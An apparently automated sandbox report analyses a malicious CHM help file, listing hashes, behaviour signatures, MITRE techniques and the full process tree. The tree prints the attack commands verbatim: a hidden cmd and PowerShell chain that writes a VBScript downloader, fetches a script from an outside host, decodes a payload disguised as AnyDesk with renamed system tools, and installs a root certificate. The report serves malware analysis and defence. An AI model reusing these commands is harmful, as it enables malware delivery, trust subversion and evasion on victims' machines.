Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15/01/2025, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
AVSL-004673321/AVSL-004673321.chm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
AVSL-004673321/AVSL-004673321.chm
Resource
win10v2004-20241007-en
General
-
Target
AVSL-004673321/AVSL-004673321.chm
-
Size
75KB
-
MD5
98ea3f95d115f45570febc7a1872b1a7
-
SHA1
a0985ee5bba1ed9ea30a4422c4007d35efde92d2
-
SHA256
94492a4bfc8998c413bd30023b60427b394e5950eed33373f07faaf863c1d3f3
-
SHA512
cbd8258068e3d25a682d9402a68adf5b9f8fba7414545b86af1e801c705dca4c77b5df77696b867cddf20f803f4cb599f472d3e76202df2dd1e75471b15afd86
-
SSDEEP
1536:4pVD2VwAO+rou4327/9AbCtkFLStN1osGQPGYQ+yV:uVgbO+rv79kCOUbKnQDQ+C
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2776 powershell.exe 1112 powershell.exe -
Executes dropped EXE 6 IoCs
pid Process 2828 ript.exe 1988 alpha.pif 1692 phf.pif 3028 alpha.pif 2116 phf.pif 2336 awpha.pif -
Loads dropped DLL 7 IoCs
pid Process 2776 powershell.exe 2776 powershell.exe 2776 powershell.exe 2776 powershell.exe 356 cmd.exe 1988 alpha.pif 356 cmd.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 316 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1096 PING.EXE -
Kills process with taskkill 1 IoCs
pid Process 1596 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ript.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1096 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2776 powershell.exe 1112 powershell.exe 1112 powershell.exe 1112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 1596 taskkill.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2336 awpha.pif 2336 awpha.pif 2336 awpha.pif 2336 awpha.pif -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2336 awpha.pif 2336 awpha.pif 2336 awpha.pif 2336 awpha.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2544 hh.exe 2544 hh.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2544 wrote to memory of 316 2544 hh.exe 30 PID 2544 wrote to memory of 316 2544 hh.exe 30 PID 2544 wrote to memory of 316 2544 hh.exe 30 PID 316 wrote to memory of 1032 316 cmd.exe 32 PID 316 wrote to memory of 1032 316 cmd.exe 32 PID 316 wrote to memory of 1032 316 cmd.exe 32 PID 316 wrote to memory of 2776 316 cmd.exe 33 PID 316 wrote to memory of 2776 316 cmd.exe 33 PID 316 wrote to memory of 2776 316 cmd.exe 33 PID 2776 wrote to memory of 2828 2776 powershell.exe 34 PID 2776 wrote to memory of 2828 2776 powershell.exe 34 PID 2776 wrote to memory of 2828 2776 powershell.exe 34 PID 316 wrote to memory of 1112 316 cmd.exe 37 PID 316 wrote to memory of 1112 316 cmd.exe 37 PID 316 wrote to memory of 1112 316 cmd.exe 37 PID 1112 wrote to memory of 356 1112 powershell.exe 38 PID 1112 wrote to memory of 356 1112 powershell.exe 38 PID 1112 wrote to memory of 356 1112 powershell.exe 38 PID 316 wrote to memory of 1596 316 cmd.exe 40 PID 316 wrote to memory of 1596 316 cmd.exe 40 PID 316 wrote to memory of 1596 316 cmd.exe 40 PID 356 wrote to memory of 1676 356 cmd.exe 41 PID 356 wrote to memory of 1676 356 cmd.exe 41 PID 356 wrote to memory of 1676 356 cmd.exe 41 PID 356 wrote to memory of 1504 356 cmd.exe 43 PID 356 wrote to memory of 1504 356 cmd.exe 43 PID 356 wrote to memory of 1504 356 cmd.exe 43 PID 356 wrote to memory of 1480 356 cmd.exe 44 PID 356 wrote to memory of 1480 356 cmd.exe 44 PID 356 wrote to memory of 1480 356 cmd.exe 44 PID 356 wrote to memory of 1988 356 cmd.exe 45 PID 356 wrote to memory of 1988 356 cmd.exe 45 PID 356 wrote to memory of 1988 356 cmd.exe 45 PID 1988 wrote to memory of 1692 1988 alpha.pif 46 PID 1988 wrote to memory of 1692 1988 alpha.pif 46 PID 1988 wrote to memory of 1692 1988 alpha.pif 46 PID 356 wrote to memory of 3028 356 cmd.exe 47 PID 356 wrote to memory of 3028 356 cmd.exe 47 PID 356 wrote to memory of 3028 356 cmd.exe 47 PID 3028 wrote to memory of 2116 3028 alpha.pif 48 PID 3028 wrote to memory of 2116 3028 alpha.pif 48 PID 3028 wrote to memory of 2116 3028 alpha.pif 48 PID 356 wrote to memory of 2336 356 cmd.exe 49 PID 356 wrote to memory of 2336 356 cmd.exe 49 PID 356 wrote to memory of 2336 356 cmd.exe 49 PID 356 wrote to memory of 1096 356 cmd.exe 50 PID 356 wrote to memory of 1096 356 cmd.exe 50 PID 356 wrote to memory of 1096 356 cmd.exe 50
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\AVSL-004673321\AVSL-004673321.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\extrac32.exeextrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe3⤵PID:1032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd"3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Public\ript.exe"C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2828
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\df.cmd" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"5⤵PID:1676
-
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"5⤵PID:1504
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"5⤵PID:1480
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 95⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 96⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 125⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 126⤵
- Executes dropped EXE
PID:2116
-
-
-
C:\Users\Public\awpha.pif"C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2336
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 55⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1096
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hh.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Window
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56e8a3dba6c562f6f93871896ec0cfe16
SHA16a38c543c15195b989e131413f962bccafa238eb
SHA25608e32f1dfa2a51c5435bb8d580b6a9c8f4d0a11bcad7a405344d6a58972b387a
SHA512f2ebc29bf055b058db00f1ca3d52d7249426a2971de03c0e45b2d66be25d654c17194b76c38ec5da313e633184342712d27dcfabfb94c587bce037f6919cba16
-
Filesize
1.6MB
MD54b6b8688bffe5b3ce33d16f6fb02e0ec
SHA1f287b2320d312ee1ec4ad30d251f837860b23699
SHA256b8d9fedf4ee1a38007dbd30c7035e0051221689bcf24f1b309a20aea9a0022df
SHA5129aedba5b7dadde70dc5bcd2063d9e6ccbf26f2137890c7ed2214b875bd000df85a54622fcaff1189d4fec04e3a9a705182ff79aa919e88f0193b0b3724b9aafe
-
Filesize
194B
MD571efa4ec6c67fa5665b1d0c64d60fc25
SHA1f546eda2b94df327b7ad5fa5bb0ba20cd37b2623
SHA25608212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898
SHA5127b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
43KB
MD51b79536d9033da4ee3b8b21354dbd391
SHA109b4a38f0a6960768f26ef86a30bc0167e690f50
SHA256385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95
SHA5122475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae
-
Filesize
2.3MB
MD5800b673badb63ad57e96324389a9f77b
SHA1e72da9e4dbe7f584a449d434e63ad71a2d4b74d0
SHA25660412b1b9b974a1309f7209def199a77e6d087f67d58018f26d035505f5cc7a6
SHA5120a4c0fc2cf809f5a520d9484b519b960fedbfe379129a454db91b73dc97a30bb8f581644e7c3187a46e4333bf3c7d02db3baea8903fa66b8089da582233b5618
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
152KB
MD5791af7743252d0cd10a30d61e5bc1f8e
SHA170096a77e202cf9f30c064956f36d14bcbd8f7bb
SHA256e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15
SHA512d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb